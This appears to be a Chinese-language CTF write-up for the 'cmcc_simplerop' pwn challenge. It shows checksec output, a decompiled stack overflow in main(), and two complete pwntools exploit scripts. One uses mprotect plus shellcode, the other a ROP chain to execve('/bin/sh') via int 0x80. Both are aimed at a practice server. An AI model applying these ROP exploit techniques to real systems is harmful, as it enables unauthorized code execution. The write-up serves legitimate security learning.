HugeH4rD

cmcc_simplerop

Ubuntu 16 来源：https://github.com/bash-c/pwn_repo

---

checksec

[*] '/home/zelas/Desktop/pwn/cmcc_simplerop/simplerop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled		//栈不可执行
    PIE:      No PIE (0x8048000)

└─$ file simplerop simplerop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=bdd40d725b490b97d5a25857a6273870c7de399f, not stripped
静态编译

IDA

main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+1Ch] [ebp-14h] BYREF

  puts("ROP is easy is'nt it ?");
  printf("Your input :");
  fflush(stdout);
  return read(0, &v4, 100);			//栈溢出
}

0x02

---

思路

1.用mprotect()函数修改bss地址段为rwx类型,

2.向bss段写入shellcode

3.执行

0x03

---

exp

from pwn import *

context(arch='i386', os='linux', log_level='debug')
# io = process('./simplerop')
io = remote('node4.buuoj.cn', 27778)
elf = ELF('./simplerop')
read_addr = 0x806cd50
pop_edx_ecx_ebx = 0x806e850
binsh_addr = 0x80eaf80
mprotect_addr = 0x806d870

payload = flat(b'a'*0x20, mprotect_addr, pop_edx_ecx_ebx, 0x80ea000, 0x1000, 7, read_addr, pop_edx_ecx_ebx, 0, binsh_addr, 0x100, binsh_addr)
io.sendlineafter(b'it', payload)
sleep(1)
payload2 = asm(shellcraft.sh())
io.sendline(payload2)
io.interactive()

0x04

---

思路2

1.溢出int 80 执行execve

2.先控制各个寄存器

3.由于文件中没用binsh字符串，先用read函数在bss段写入‘/bin/sh’，再调整寄存器执行exec函数

0x05

---

exp

from pwn import *

context(arch='i386', os='linux', log_level='debug')
# io = process('./simplerop')
io = remote('node4.buuoj.cn', 27778)
elf = ELF('./simplerop')

read_addr = 0x806cd50
pop_eax = 0x80bae06
pop_edx_ecx_ebx = 0x806e850
int80_addr = 0x80493e1
binsh_addr = 0x80eaf80

payload = flat(b'a'*0x20, read_addr, pop_edx_ecx_ebx, 0, binsh_addr, 0x8, pop_eax, 11, pop_edx_ecx_ebx, 0, 0, binsh_addr, int80_addr)
io.sendline(payload)
io.sendline(b'/bin/sh\x00')
io.interactive()